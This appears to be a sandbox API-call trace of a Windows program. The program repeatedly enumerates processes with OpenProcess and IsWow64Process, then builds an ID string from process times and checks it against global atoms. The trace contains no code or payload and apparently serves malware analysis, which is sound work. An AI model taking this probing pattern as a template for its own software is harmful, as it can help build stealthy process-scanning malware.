	[0094.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.979] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.979] CloseHandle (hObject=0x248) returned 1
	[0094.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.980] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.980] CloseHandle (hObject=0x248) returned 1
	[0094.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.980] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.980] CloseHandle (hObject=0x248) returned 1
	[0094.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.980] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.980] CloseHandle (hObject=0x248) returned 1
	[0094.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.980] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.980] CloseHandle (hObject=0x248) returned 1
	[0094.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.980] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.980] CloseHandle (hObject=0x248) returned 1
	[0094.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.980] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.980] CloseHandle (hObject=0x248) returned 1
	[0094.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.981] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.981] CloseHandle (hObject=0x248) returned 1
	[0094.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.981] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.981] CloseHandle (hObject=0x248) returned 1
	[0094.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.981] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.981] CloseHandle (hObject=0x248) returned 1
	[0094.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.981] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.981] CloseHandle (hObject=0x248) returned 1
	[0094.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.981] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.981] CloseHandle (hObject=0x248) returned 1
	[0094.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.982] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.982] CloseHandle (hObject=0x248) returned 1
	[0094.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.982] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.982] CloseHandle (hObject=0x248) returned 1
	[0094.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.982] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.982] CloseHandle (hObject=0x248) returned 1
	[0094.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.982] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.982] CloseHandle (hObject=0x248) returned 1
	[0094.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.982] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.982] CloseHandle (hObject=0x248) returned 1
	[0094.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.982] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.983] CloseHandle (hObject=0x248) returned 1
	[0094.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.983] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.983] CloseHandle (hObject=0x248) returned 1
	[0094.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.983] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.983] CloseHandle (hObject=0x248) returned 1
	[0094.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.983] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.983] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.983] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.984] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.984] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.984] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.984] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.984] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.984] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.984] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.985] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.985] CloseHandle (hObject=0x248) returned 1
	[0094.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.985] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.985] CloseHandle (hObject=0x248) returned 1
	[0095.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.065] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.065] CloseHandle (hObject=0x248) returned 1
	[0095.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.065] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.065] CloseHandle (hObject=0x248) returned 1
	[0095.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.065] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.065] CloseHandle (hObject=0x248) returned 1
	[0095.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.066] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.066] CloseHandle (hObject=0x248) returned 1
	[0095.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.066] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.066] CloseHandle (hObject=0x248) returned 1
	[0095.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.066] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.066] CloseHandle (hObject=0x248) returned 1
	[0095.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.066] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.066] CloseHandle (hObject=0x248) returned 1
	[0095.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.066] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.067] CloseHandle (hObject=0x248) returned 1
	[0095.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.067] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.067] CloseHandle (hObject=0x248) returned 1
	[0095.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.067] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.067] CloseHandle (hObject=0x248) returned 1
	[0095.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.067] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.067] CloseHandle (hObject=0x248) returned 1
	[0095.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.067] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.067] CloseHandle (hObject=0x248) returned 1
	[0095.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.067] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.068] CloseHandle (hObject=0x248) returned 1
	[0095.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.068] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.068] CloseHandle (hObject=0x248) returned 1
	[0095.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.068] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.068] CloseHandle (hObject=0x248) returned 1
	[0095.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.068] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.068] CloseHandle (hObject=0x248) returned 1
	[0095.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.068] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.068] CloseHandle (hObject=0x248) returned 1
	[0095.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.068] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.068] CloseHandle (hObject=0x248) returned 1
	[0095.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.069] CloseHandle (hObject=0x248) returned 1
	[0095.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.069] CloseHandle (hObject=0x248) returned 1
	[0095.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.069] CloseHandle (hObject=0x248) returned 1
	[0095.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.069] CloseHandle (hObject=0x248) returned 1
	[0095.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.069] CloseHandle (hObject=0x248) returned 1
	[0095.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.070] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.070] CloseHandle (hObject=0x248) returned 1
	[0095.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.070] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.070] CloseHandle (hObject=0x248) returned 1
	[0095.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.070] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.070] CloseHandle (hObject=0x248) returned 1
	[0095.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.070] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.070] CloseHandle (hObject=0x248) returned 1
	[0095.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.070] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.070] CloseHandle (hObject=0x248) returned 1
	[0095.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.071] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.071] CloseHandle (hObject=0x248) returned 1
	[0095.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.071] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.071] CloseHandle (hObject=0x248) returned 1
	[0095.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.071] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.071] CloseHandle (hObject=0x248) returned 1
	[0095.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.071] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.072] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.072] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.072] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.072] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.072] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.072] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.073] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.073] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.073] CloseHandle (hObject=0x248) returned 1
	[0095.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.073] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.073] CloseHandle (hObject=0x248) returned 1
	[0095.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.145] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.145] CloseHandle (hObject=0x248) returned 1
	[0095.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.146] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.146] CloseHandle (hObject=0x248) returned 1
	[0095.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.146] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.146] CloseHandle (hObject=0x248) returned 1
	[0095.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.146] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.146] CloseHandle (hObject=0x248) returned 1
	[0095.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.146] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.146] CloseHandle (hObject=0x248) returned 1
	[0095.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.147] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.147] CloseHandle (hObject=0x248) returned 1
	[0095.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.147] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.147] CloseHandle (hObject=0x248) returned 1
	[0095.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.147] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.147] CloseHandle (hObject=0x248) returned 1
	[0095.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.147] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.147] CloseHandle (hObject=0x248) returned 1
	[0095.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.147] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.147] CloseHandle (hObject=0x248) returned 1
	[0095.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.148] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.148] CloseHandle (hObject=0x248) returned 1
	[0095.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.148] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.148] CloseHandle (hObject=0x248) returned 1
	[0095.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.148] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.148] CloseHandle (hObject=0x248) returned 1
	[0095.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.148] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.148] CloseHandle (hObject=0x248) returned 1
	[0095.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.148] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.148] CloseHandle (hObject=0x248) returned 1
	[0095.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.148] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.148] CloseHandle (hObject=0x248) returned 1
	[0095.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.149] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.149] CloseHandle (hObject=0x248) returned 1
	[0095.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.149] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.149] CloseHandle (hObject=0x248) returned 1
	[0095.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.149] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.149] CloseHandle (hObject=0x248) returned 1
	[0095.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.149] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.149] CloseHandle (hObject=0x248) returned 1
